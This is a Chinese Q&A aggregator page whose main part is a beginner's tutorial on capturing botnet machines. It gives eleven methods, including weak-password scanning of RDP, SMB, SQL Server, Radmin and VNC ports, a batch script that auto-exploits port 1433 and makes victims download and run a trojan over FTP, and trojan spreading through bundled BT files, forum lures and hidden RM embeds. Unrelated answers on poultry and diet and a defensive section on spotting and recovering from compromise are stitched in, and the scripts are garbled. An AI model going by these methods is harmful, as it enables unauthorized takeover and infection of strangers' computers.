怎么学抓肉鸡?

抓肉鸡的11种方法

首先得准备,免杀的STAT或一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)

(1)

扫3389端口抓肉鸡

(适合新手)(抓不了国外肉鸡)

现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话您就可以去您的空间下载您传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,您再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人您就不可能去打开IE下载木马了。

(2)

扫135端口抓肉鸡

首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用过滤有弱口令的机器,最后用开传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)

(3)

扫445端口抓肉鸡

和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)

(4)

1433端口批量溢出抓肉鸡

这个方法可以实现全自动抓鸡

要用到的工具:S扫.exenc.exe批处理文件

首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件

@

for/f"eol=;=1,="%%iin(tt.txt)dos.%%i%%/save

@

for/f"eol=;=="%%iin(.txt)%%.xxx.xx.xx556

还要新建一个tt.txt,里面您要扫的IP段,格式为XXX.XXX.XXX..XXX.XXX.XXX,中间是空格

1433是要扫描的端口,1000是扫描线程数,%%.xxx.xx.xx556这个里的XXX添您的IP,556是后面NC监听的端口

然后再写个批处理

@

<nc.txt&&%0这里的556要和上面的保持一致,您也可以改成其他的值,但是2处都要改,然后保存为nc.bat

然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载您木马的代码。

这里给出一种代码

.X.X.X(您FTP的IP)>>daima.txt

>>daima.txt

>>daima.txt

>>daima.txt(以2进制传输数据)

.exe(您的木马的文件名,要放在根目录下)>>daima.txt

>>daima.txt

ess(关闭自带防火墙)

ftp-s:daima.txt

xxx.exe(也是填您木马的文件名)

.txt

注意上面的代码回车符别删掉,要不然就没法下您的马了。

上面的步骤都搞好后,就可以开始扫肉鸡了。

先打开多个NC.bat,然后再打开扫描+溢出.bat,然后您就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有4221端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。

忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。

先休息一下,打这么多字累死了

继续

(5)

扫1433抓肉鸡之方法2

要用到的工具:端口扫描器综合利用工具

上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。

开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。

首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入您扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传您的木马,然后在用DOS命令执行您的木马就OK了。

(6)

用扫SA弱口令抓肉鸡

工具:QL综合利用工具

打开,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用SQL综合利用工具连上传马执行就好了。

(7)

扫4899空口令抓肉鸡

工具:端口扫描器4899探测器

首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用连接有空口令的机器,带开文件管理,上传的您木马运行就OK了。详细动画可以去黑客网站搜索4899

(8)

扫5900端口抓VNC肉鸡

工具:VNC扫描器VNC连接器

首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名)-i219.0.0.0-219.255.255.255(扫描IP段)

扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如,,,只有单词为才能连接。接着就用VNC连接器连接,下面就不用多说了吧?详细动画可以去黑客网站搜索VNC

接下来说说挂马抓肉鸡吧。方法有很多[52石斛网www.52shihu.com],比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。

(9)

BT挂马

顾名思义,就是把您的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然您也可以做个网页木马,然后把您网页木马的地址插入到您发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开您的网页木马,如果他的系统没有补供您网页木马所利用的漏洞的话,那他就会中您的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样您肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非您有您所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为您所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对.6版本以下的所有版本,只要您版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下版本,小心中马哈。

(10)

免费空间挂马

其实和BT差不多,就是把做好的木马上传到您申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载您的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的

(11)

用RM在论坛挂马

首先您弄个只有几秒钟的RM文件,然后插入您的网页木马,接着上传到您的空间,然后到一些支持插入RM连接的论坛发帖子,点插入播放器,输入您的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性),然后点发贴,这样别人在浏览您的帖子就会运行您的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了好像FLASH木马也可以这样的,我没试过,大家可以去研究下。

有许多人问我这样一个问题就是:什么是肉鸡!其实我也说不好是什么意思!个人认为肉鸡就是您可以控制的一台电脑!无论通过什么方式!

对于肉鸡!我建议大家先学习4899的肉鸡!先介绍一下4899!4899是一种国外的远程控制软件所开的默认端口!(那端口是什么呢?我的理解是端口的作用就是把好多计算机向您发来的信息分别从不同的管道给您!每个管道就是一个端口!并有标号!并且有的标号和一类信息是对应的!比如:从25的管道(端口)传来的信息就对应着邮件类!从80管道传来的信息就是网页信息!还有的就没有的不常用的信息,就临时开一个任意(在大于1024端口!1024之前是是一些一一对应的管道!)管道来接受信息!所以端口的作用就是通过不同的端口接受不同的来接受数据包!不知道大家明白没有!还不明白就自己查资料啊!如果我说的有错误!请尽快和我说啊!)该软件叫!分两部分!控制端和服务端!有很多服务功能!如:通过远程图形控制!(就象操作自己的计算机一样操作对方的计算机!)功能,是的远程登陆等功能!是在命令下实现的!您可以简单认为是远程操作对方的dos窗口!(其实我就是这么认为的!呵呵)上传下载文件的功能!这个功能大家很明白!就是可以在您和对方计算机之间互相传送文件!还有其他功能,等等!我做了个动画!其实这个软件不是大家所认为的木马!(之所以不是木马!因为其功能都不符合木马的要求!)只是一个普通的远程控制的工具!一些用户用该软件远程管理自己的机器!可以从公司的电脑直接到加里的电脑取文件!或者放文件!管理机器等等!但是不知道为什么!有的用户却不知道为什么不给客户端设置密码!这样我们就有了可乘之机!我们可以用特定工具扫描开4899的机器!(4899这个是的特征!呵呵!)然后用客户端进行连接!该软件唯一确认您身份的东西就是连接时需要密码!而有的用户却没有设置!所以!我们就可以进入其计算机,并做软件所提供的功能操作!(就是我上面所说的!和一些没有说的!)关于4899的肉鸡,从扫描--到利用,我做了个动画!(动画在菜鸟帝国里有下载!叫:4899的应用,地址:.w5.51web.cn/.asp?id=347还有毛毛做的4899的动画也要看看!站上也有的!自己艘艘把!)大家可以看看!然后自己再照着画瓢!

说完了4899在说说,这个是一种叫爱情病毒所开的超级后门端口!如果您中了该病毒,病毒就会在您的机器里开一个的端口,使其他人可以通过服务,用命令您的机器的(所有所所的命令都是在dos中键入的!win98的是dos而2000的是命令提示符!)来连接上您的电脑,并且连接后权限很大!可以进行任何级别的命令操作!所以,如果您的机器开了这个端口请您赶快用杀毒软件把他杀掉!不然遇到可恶的入侵者,您的机器可就遭殃了!而从入侵的角度来看!我们就可以用端口扫描工具(如:)去扫开的机器!然后上去!就可以轻松得到一台机器的shell(shell:简单认为就是一个可以操作远程计算机的dos命令窗口!)并可以进行一切权限的操作!大家可以试试!不过该病毒是个老病毒了!所以可能扫描现在不到了,而且病毒作者只允许利用该端口一次!所以...........但是大家要知道!有很多病毒我们是可以利用的!比如:益出!一场大范围的病毒侵袭后,一般会有高手根据病毒写出相应的益出程序!(什么是益出呢?我那缓冲区益出给大家举例!如果您向一个只能容纳20毫升的杯子里倒入30毫升的牛奶会出现什么情况呢?呵呵!一定就会有10毫升流出了杯子!把这个例子用在缓冲区益出里就是您向计算机“倒入”“30毫升”的数据!而缓冲区只能处理“20毫升”那“10毫升”到那里去了呢?呵呵!可不是象牛奶一样浪费了!,而是把一些别的合法数据给覆盖了!这样如果这“10毫升”数据是一些病毒代码,或者黑客程序,呵呵!后果就可想而知了.............)使我们这些菜鸟可以通过这些程序轻而易举的拿到对中病毒计算机的shell!当然不仅病毒可以益出!微软的很多漏洞都是可以的!所以大家要关注微软的漏洞报告!以便得到新鲜的肉鸡!呵呵!

上面说的一些简单的获得肉鸡的方法!有4899空密码的!病毒开的后门的!还有利用漏洞益出的!等等!大家还可能说您怎么不说3389啊!呵呵!是要说说!其实3389是微软提供的远程桌面的服务,英文名字叫“”所开的端口(端口可以更改)。通过客户端(连接软件),用户帐号来进行图形操作远程的计算机!是自带的服务!但不是每个操作系统都有的!的和2003版本的有还有xp系统的有!而个人板是没有该服务的!通常所说的3389肉鸡是对方开了此服务!并且您有对方的登陆帐号!(注意:帐号权限必须是adm权限!)可以登陆对方计算机进行操作的!所以只要扫开3389端口的机器就可以基本判断哪个计算机开了该服务!然后获得登陆帐号就可以了!但是!!!帐号您怎么获得呢?这是个大问题!但也不是不能!首先您可以利用输入法漏洞!通过这个漏洞您可以直接进入计算机,不用帐号!(具体利用自己找!)但是这个漏洞也是很早的了!现在用户都已经打上了补丁!(但也不是一定没有次漏洞的!)当然您可以用扫nt弱口令获得对方的登陆帐号!但是个人认为也不是很好!因为现在也很少能扫到若口令的3389的肉鸡了!那么直接获得3389肉鸡是希望不大了!可是3389的肉鸡毕竟是肉鸡中的精品!好处多多的!那怎么获得呢?呵呵!其实3389的获得都是通过别的漏洞入侵了肉鸡后,自己开的3389(远程桌面服务),所以,大家还是先学习别的漏洞的入侵!在学习3389!当然这里涉及到怎么开肉鸡的3389服务!大家就要自己找资料了!

前面提到了!这个是安全焦点出的一个漏洞扫描分析工具!用在我们手里就是扫描肉鸡的工具!(其实我还不会用!)这里不建议新人使用!因为确实是大名鼎鼎,很多新人一接触黑客就知道了他!并用他扫啊扫!扫了半天没有任何信息!终于扫到东西了!呵呵!却不知道怎么利用!这也就是为什么我不建议新人用的原因!就是扫到了漏洞不知道该怎么利用!还有流光,也是一样!功能强大!(但是我到今天还摸不到他是怎么用!连怎么添ip都不知道!(本人愚顿!))但比较复杂!当然您如果学习到了一定水平,(知道了里面的漏洞的利用!)是一定要用这些扫描软件的!现在推荐大家还是去看动画!学习专门的漏洞入侵!用专门的漏洞扫描工具!

最后说几句!大家在找肉鸡时要灵活运用!比如:您扫了很多4899的肉鸡!(一般是些个人用户!但也有服务器!)那么要想找其中是服务器的怎么办呢?呵呵!您可以用!他经过设置后可以扫描已有ip的端口!现在知道怎么做了把!呵呵!一般服务器为了方便管理都会开3389端口的!我们就可以利用这个特征,扫描4899肉鸡中开3389端口的机器!这样.........呵呵!我就不细说了!关于的应用!大家自己找资料吧!还有啊!有的后门是没有密码的!如(后面会介绍到!)他默认的端口是5277!而有的粗心的黑客不设置直接生成后门!所以!就回留下特征!呵呵!不用我说大家一定知道了!应该扫描开5277端口的机器!然后用相应的连接方法进行连接!就可以获得“同行”“送”您的肉鸡!呵呵!类似的方法还有很多!希望大家能灵活运用!轻松找到多多的肉鸡!

用粗铁条长一点的,一头做个钩状,用来勾小鸡腿,以爪子出不去为准。一勾一个

长期吃什么牛最好猪肉牛肉羊肉鱼肉鸡肉?

您想问的是长期吃什么肉最好是吧?相对来说吃鱼肉、鸡肉等白肉是比较好比较健康的。当然这也是在排除鱼和鸡非激素饲料饲养的。通常把牛肉、羊肉和猪肉叫做红肉,而把鱼肉、禽肉叫做白肉。红肉的特点是肌肉纤维粗硬、脂肪含量较高,而白肉肌肉纤维细腻,脂肪含量较低,脂肪中不饱和脂肪酸含量较高。红肉和白肉对人类慢性病的影响也不一样,最近流行病学研究发现,吃红肉的人群患结肠癌、乳腺癌、冠心病等慢性病的危险性增高,而吃白肉可以降低患这些病的危险性,延长寿命。

查看详细

什么是安卓肉鸡?

所谓肉鸡就是指专门用于生产鸡肉的仔鸡,它是食用肉仔鸡的总称。现代肉鸡的概念与传统肉鸡截然不同。50年代以前,传统肉鸡主要来源于淘汰的小公鸡和产蛋鸡,而现代肉鸡则是指通过专门化品系配套杂交生产的专门用于食肉的鸡。根据屠宰期和体重大小的不同,一般分为肉用仔鸡、炸用仔鸡和烤用仔鸡。肉用仔鸡一般2千克左右屠宰,炸用仔鸡较大一些,烤用仔鸡则更大。现在各国生产的肉鸡都以肉仔鸡为主。东、西方各国由于消费习惯和烹调方式的不同,肉仔鸡出售的体重和日龄也有所不同。美国所说的肉用仔鸡,大部分为6~7周龄,体重在1.90~2.25千克出售的肉鸡。在加工鸡肉产品中,作1/2或1/4分割的约占50%,加工成净肉的约有30%,加工白条、净膛和胴体的肉鸡约占20%,这些加工鸡肉产品中约有30%用作快餐。而北欧、东欧各国及荷兰生产的肉用仔鸡,大部分4~5周龄、体重在1.3~1.5千克出售,且多以整鸡或1/2或1/4分割后作烤鸡用。西班牙、意大利、法国等南欧各国生产的肉用仔鸡,一般在6~7周龄、体重1.8~2.2千克出售,多用于带骨烤或煮菜用。日本则很特殊,大部分肉鸡加工成净肉用,约占80%,带骨用的只占20%左右。在世界上肉鸡出售体重最大的,一般在1.9~2.7千克。这是因为鸡大,出肉率高,净肉成本低,且零售店欢迎腿肉和胸肉。日本生产的体重在1.1~1.5千克的小型肉用仔鸡,主要是供旅馆、饭店、菜馆等业务用,这种小型鸡一般养4~5周龄出售,数量约占总产量的20%左右。

查看详细

荨麻疹能吃什么、猪肉鸡肉可以吗?

荨麻疹病因复杂,主要与食品及食品添加剂、药物、物理因素、化学物质刺激、昆虫叮咬等有关。饮食要清淡,少吃辛辣刺激性食物和易过敏食物如鸡蛋、牛奶、海鲜、菌类等,以免加重病情。可以吃猪肉,鸡肉属于发物,如果对鸡肉不过敏,可以食用。多吃蔬菜水果。

查看详细

什么是肉鸡怎么使用肉鸡?

所谓肉鸡就是指专门用于生产鸡肉的仔鸡,它是食用肉仔鸡的总称。现代肉鸡的概念与传统肉鸡截然不同。50年代以前,传统肉鸡主要来源于淘汰的小公鸡和产蛋鸡,而现代肉鸡则是指通过专门化品系配套杂交生产的专门用于食肉的鸡。根据屠宰期和体重大小的不同,一般分为肉用仔鸡、炸用仔鸡和烤用仔鸡。肉用仔鸡一般2千克左右屠宰,炸用仔鸡较大一些,烤用仔鸡则更大。现在各国生产的肉鸡都以肉仔鸡为主。东、西方各国由于消费习惯和烹调方式的不同,肉仔鸡出售的体重和日龄也有所不同。美国所说的肉用仔鸡,大部分为6~7周龄,体重在1.90~2.25千克出售的肉鸡。在加工鸡肉产品中,作1/2或1/4分割的约占50%,加工成净肉的约有30%,加工白条、净膛和胴体的肉鸡约占20%,这些加工鸡肉产品中约有30%用作快餐。而北欧、东欧各国及荷兰生产的肉用仔鸡,大部分4~5周龄、体重在1.3~1.5千克出售,且多以整鸡或1/2或1/4分割后作烤鸡用。西班牙、意大利、法国等南欧各国生产的肉用仔鸡,一般在6~7周龄、体重1.8~2.2千克出售,多用于带骨烤或煮菜用。日本则很特殊,大部分肉鸡加工成净肉用,约占80%,带骨用的只占20%左右。在世界上肉鸡出售体重最大的,一般在1.9~2.7千克。这是因为鸡大,出肉率高,净肉成本低,且零售店欢迎腿肉和胸肉。日本生产的体重在1.1~1.5千克的小型肉用仔鸡,主要是供旅馆、饭店、菜馆等业务用,这种小型鸡一般养4~5周龄出售,数量约占总产量的20%左右。

查看详细

肉鸡怎么控制?

所谓电脑肉鸡,就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix等;更可以是一家公司企业学校甚至是政府军队的服务器,一般所说的肉鸡是一台开了3389端口的Win2K系统的服务器,所以3389端口没必要开时关上最好。

要登陆肉鸡,必须知道3个参数:远程电脑的IP、用户名、密码。

说到肉鸡,就要讲到远程控制。远程控制软件例如灰鸽子、上兴等。还有有些远程控制软件需要在肉鸡上挂马。

肉鸡不是吃的那种,是中了木马,或者留了后门,可以被远程操控的机器,现在许多人把有权限的机器也叫肉鸡。

谁都不希望自己的电脑被他人控制,但是很多人的电脑是几乎不设防的,很容易被远程攻击者完全控制。您的电脑就因此成为别人砧板上的肉,别人想怎么吃就怎么吃,肉鸡(机)一名由此而来。

[编辑本段]如何检测自己是否成为肉鸡

注意以下几种基本的情况:

1:、MSN的异常登录提醒(系统提示上一次的登录IP不符)

2:网络游戏登录时发现装备丢失或与上次下线时的位置不符,甚至用正确的密码无法登录。

3:有时会突然发现您的鼠标不听使唤,在您不动鼠标的时候,鼠标也会移动,并且还会点击有关按钮进行操作。

4:正常上网时,突然感觉很慢,硬盘灯在闪烁,就象您平时在COPY文件。

5:当您准备使用摄像头时,系统提示,该设备正在使用中。

6:在您没有使用网络资源时,您发现网卡灯在不停闪烁。如果您设定为连接后显示状态,您还会发现屏幕右下角的网卡图标在闪。

7:服务列队中出可疑程服务。

8:宽带连接的用户在硬件打开后未连接时收到不正常数据包。(可能有程序后台连接)

9:防火墙失去对一些端口的控制。

10:上网过程中计算机重启。

11:有些程序如杀毒软件防火墙卸载时出现闪屏(卸载界面一闪而过,然后报告完成。)

12:一些用户信任并经常使用的程序(`杀毒)卸载后。目录文仍然存在,删除后自动生成。

13:电脑运行过程中或者开机的时候弹出莫名其妙的对话框

以上现象,基本是主观感觉,并不十分准确,但需要提醒您注意。

接下来,我们可以借助一些软件来观察网络活动情况,以检查系统是否被入侵。

1.注意检查防火墙软件的工作状态

比如金山网镖。在网络状态页,会显示当前正在活动的网络连接,仔细查看相关连接。如果发现自己根本没有使用的软件在连接到远程计算机,就要小心了。

2.推荐使用,可以非常清晰的查看当前网络的活动状态。

一般的木马连接,是可以通过这个工具查看到结果的。

这里说一般的木马连接,是区别于某些精心构造的木马采用更高明的隐藏技术,不易被发现的情况。

3.使用金山清理专家进行在线诊断,特别注意全面诊断的进程项

清理专家会对每一项进行安全评估,当遇到未知项时,需要特别小心。

4.清理专家百宝箱的进程管理器

可以查找可疑文件,帮您简单的检查危险程序所在

成为肉鸡后的自救方法

一、正在上网的用户,发现异常应首先马上断开连接

如果您发现IE经常询问是您是否运行某些控件,或是生成莫名其妙的文件、询问调试脚本什么的,一定要警惕了,您可能已经中招了。典型的上网被入侵有两种情况:

一是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题,这算是轻的;还有就是遇到可以格式化硬盘或是令您的不断打开窗口,直到耗尽资源死机——这种情况恶劣得多,您未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。

二是潜在的木马发作,或是蠕虫类病毒发作,让您的机器不断地向外界发送您的隐私,或是利用您的名义和邮件地址发送垃圾,进一步传播病毒;还有就是黑客的手工入侵,窥探您的隐私或是删除破坏您的文件。

自救措施:马上断开连接,这样在自己的损失降低的同时,也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机,进一步的处理措施请参看后文。

二、中毒后,应马上备份、转移文档和邮件等

中毒后运行杀毒软件杀毒是理所当然的了,但为了防止杀毒软件误杀或是删掉您还未处理完的文档和重要的邮件,您应该首先将它们备份到其他储存媒体上。有些长文件名的文件和未处理的邮件要求在下备份,所以上文笔者建议您先不要退出,因为病毒一旦发作,可能就不能进入了。

不管这些文件是否带毒,您都应该备份,用标签纸标记为“待查”即可。因为有些病毒是专门针对某个杀毒软件设计的,一运行就会破坏其他文件,所以先备份是防患于未然的措施。等您清除完硬盘内的病毒后,再来慢慢分析处理这些额外备份的文件较为妥善。

三、需要在下先运行一下杀CIH的软件(即使是带毒环境)

如果是发现了CIH病毒,要注意不能完全按平时报刊和手册建议的措施,即先关机、冷启动后用系统盘来引导再杀毒,而应在带毒的环境下也运行一次专杀CIH的软件。这样做,杀毒软件可能会报告某些文件受读写保护无法清理,但带毒运行的实际目的不在于完全清除病毒,而是在于把CIH下次开机时候的破坏减到最低,以防它在再次开机时破坏主板的BIOS硬件,导致黑屏,让您下一步的杀毒工作无法进行。

四、需要干净的DOS启动盘和DOS下面的杀毒软件

到现在,就应该按很多杀毒软件的标准手册去按部就班地做。即关机后冷启动,用一张干净的DOS启动盘引导;另外由于中毒后可能已经被破坏了部分关键文件,会频繁地报告非法操作,所以下的杀毒软件可能会无法运行。所以请您也准备一个DOS下面的杀毒软件以防万一。

即使能在下运行杀毒软件,也请用两种以上工具交叉清理。在多数情况下可能要重装,因为病毒会破坏掉一部分文件让系统变慢或出现频繁的非法操作。比如即使杀了CIH,微软的邮件程序也是反应较慢的。建议不要对某种杀毒软件带偏见,由于开发时候侧重点不同、使用的杀毒引擎不同,各种杀毒软件都是有自己的长处和短处的,交叉使用效果较理想。

五、如果有Ghost和分区表、引导区的备份,用之来恢复一次最保险

如果您在平时用Ghost备份做了的,用之来镜像一次,得到的操作系统是最保险的。这样连潜在的未杀光的木马程序也顺便清理了。当然,这要求您的Ghost备份是绝对可靠的。要是作Ghost的时候把木马也“备份”了就后患无穷了。

六、再次恢复系统后,更改您的网络相关密码

包括登录网络的用户名、密码,邮箱的密码和的密码等,防止黑客用上次入侵过程中得到的密码进入您的系统。另外因为很多蠕虫病毒发作会向外随机发送您的信息,所以及时地更改是必要的。

查看详细
回复日期:2020-11-27 热度:425